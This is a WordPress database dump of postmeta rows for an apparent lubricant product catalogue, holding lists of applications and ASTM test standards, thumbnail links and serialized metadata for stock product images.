INSERT INTO `wp_postmeta` VALUES (6611, 642, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6612, 750, '_wp_attached_file', '2016/08/EPON-Miller-Stephenson.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6613, 750, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3500;s:6:"height";i:5000;s:4:"file";s:34:"2016/08/EPON-Miller-Stephenson.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"EPON-Miller-Stephenson-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"EPON-Miller-Stephenson-560x800.jpg";s:5:"width";i:560;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"EPON-Miller-Stephenson-768x1097.jpg";s:5:"width";i:768;s:6:"height";i:1097;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"EPON-Miller-Stephenson-1120x1600.jpg";s:5:"width";i:1120;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"EPON-Miller-Stephenson-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"EPON-Miller-Stephenson-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"EPON-Miller-Stephenson-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"EPON-Miller-Stephenson-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6614, 643, '_thumbnail_id', '740'); 
INSERT INTO `wp_postmeta` VALUES (6615, 643, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6616, 643, '719_default_editor', '<ul>\r\n 	<li>MIL PRF-27617</li>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6617, 644, '_thumbnail_id', '744'); 
INSERT INTO `wp_postmeta` VALUES (6618, 644, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6619, 644, '719_default_editor', '<ul>\r\n 	<li>MIL PRF-27617</li>\r\n 	<li>NSF H-1 Rated</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6620, 638, '_thumbnail_id', '745'); 
INSERT INTO `wp_postmeta` VALUES (6621, 638, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6622, 638, '719_default_editor', '<ul>\r\n 	<li>MIL PRF-27617</li>\r\n 	<li>NSF H-1</li>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (6623, 645, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6624, 645, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6625, 645, '_thumbnail_id', '749'); 
INSERT INTO `wp_postmeta` VALUES (6626, 646, '_thumbnail_id', '685'); 
INSERT INTO `wp_postmeta` VALUES (6627, 646, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6628, 646, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6629, 714, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6630, 644, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6631, 643, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6632, 751, '_wp_attached_file', '2016/08/shutterstock_3847714.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6633, 751, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4368;s:6:"height";i:2912;s:4:"file";s:32:"2016/08/shutterstock_3847714.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"shutterstock_3847714-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:32:"shutterstock_3847714-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:32:"shutterstock_3847714-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:34:"shutterstock_3847714-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:32:"shutterstock_3847714-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:32:"shutterstock_3847714-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:32:"shutterstock_3847714-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:32:"shutterstock_3847714-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6634, 752, '_wp_attached_file', '2016/08/shutterstock_139725616.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6635, 752, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5080;s:6:"height";i:3387;s:4:"file";s:34:"2016/08/shutterstock_139725616.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_139725616-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_139725616-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_139725616-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_139725616-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_139725616-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_139725616-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_139725616-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_139725616-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6636, 753, '_wp_attached_file', '2016/08/shutterstock_213079702.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6637, 753, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3237;s:6:"height";i:2059;s:4:"file";s:34:"2016/08/shutterstock_213079702.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_213079702-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_213079702-800x509.jpg";s:5:"width";i:800;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_213079702-768x489.jpg";s:5:"width";i:768;s:6:"height";i:489;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_213079702-1600x1018.jpg";s:5:"width";i:1600;s:6:"height";i:1018;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_213079702-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_213079702-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_213079702-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_213079702-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6638, 754, '_wp_attached_file', '2016/08/shutterstock_311213984.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6639, 754, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4164;s:6:"height";i:2771;s:4:"file";s:34:"2016/08/shutterstock_311213984.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_311213984-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_311213984-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_311213984-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_311213984-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_311213984-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_311213984-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_311213984-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_311213984-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6640, 755, '_wp_attached_file', '2016/08/shutterstock_321602429.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6641, 755, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4992;s:6:"height";i:2808;s:4:"file";s:34:"2016/08/shutterstock_321602429.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_321602429-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_321602429-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_321602429-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_321602429-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_321602429-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_321602429-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_321602429-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_321602429-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6642, 756, '_wp_attached_file', '2016/08/shutterstock_331929857.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6643, 756, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2690;s:6:"height";i:1859;s:4:"file";s:34:"2016/08/shutterstock_331929857.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_331929857-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_331929857-800x553.jpg";s:5:"width";i:800;s:6:"height";i:553;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_331929857-768x531.jpg";s:5:"width";i:768;s:6:"height";i:531;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_331929857-1600x1106.jpg";s:5:"width";i:1600;s:6:"height";i:1106;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_331929857-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_331929857-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_331929857-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_331929857-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6644, 757, '_wp_attached_file', '2016/08/shutterstock_331929869.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6645, 757, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2269;s:6:"height";i:2202;s:4:"file";s:34:"2016/08/shutterstock_331929869.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_331929869-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_331929869-800x776.jpg";s:5:"width";i:800;s:6:"height";i:776;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_331929869-768x745.jpg";s:5:"width";i:768;s:6:"height";i:745;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_331929869-1600x1553.jpg";s:5:"width";i:1600;s:6:"height";i:1553;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_331929869-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_331929869-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_331929869-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_331929869-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:56;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6646, 758, '_wp_attached_file', '2016/08/shutterstock_369300404.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6647, 758, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5000;s:6:"height";i:3000;s:4:"file";s:34:"2016/08/shutterstock_369300404.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_369300404-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_369300404-800x480.jpg";s:5:"width";i:800;s:6:"height";i:480;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_369300404-768x461.jpg";s:5:"width";i:768;s:6:"height";i:461;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_369300404-1600x960.jpg";s:5:"width";i:1600;s:6:"height";i:960;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_369300404-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_369300404-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_369300404-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_369300404-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6648, 759, '_wp_attached_file', '2016/08/shutterstock_384420070.jpg'); 
INSERT INTO `wp_postmeta` VALUES (6649, 759, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:2662;s:4:"file";s:34:"2016/08/shutterstock_384420070.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_384420070-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_384420070-800x532.jpg";s:5:"width";i:800;s:6:"height";i:532;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_384420070-768x511.jpg";s:5:"width";i:768;s:6:"height";i:511;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_384420070-1600x1065.jpg";s:5:"width";i:1600;s:6:"height";i:1065;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_384420070-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_384420070-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_384420070-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_384420070-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (6650, 648, '_thumbnail_id', '755'); 
INSERT INTO `wp_postmeta` VALUES (6651, 648, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6652, 648, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6653, 646, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6654, 647, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (6655, 647, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Seals</li>\r\n 	<li>Valves</li>\r\n 	<li>Oxygen Devices</li>\r\n 	<li>O-Rings</li>\r\n 	<li>Threads</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6656, 647, '719_default_editor', '<ul>\r\n 	<li>ASTM D445</li>\r\n 	<li>ASTM D2595</li>\r\n 	<li>ASTM D97</li>\r\n 	<li>ASTM D217</li>\r\n 	<li>ASTM D942</li>\r\n 	<li>ASTM D2512</li>\r\n 	<li>ASTM D6184</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (6657, 647, '_thumbnail_id', '756'); 
INSERT INTO `wp_postmeta` VALUES (6658, 649, '_thumbnail_id', '752'); 
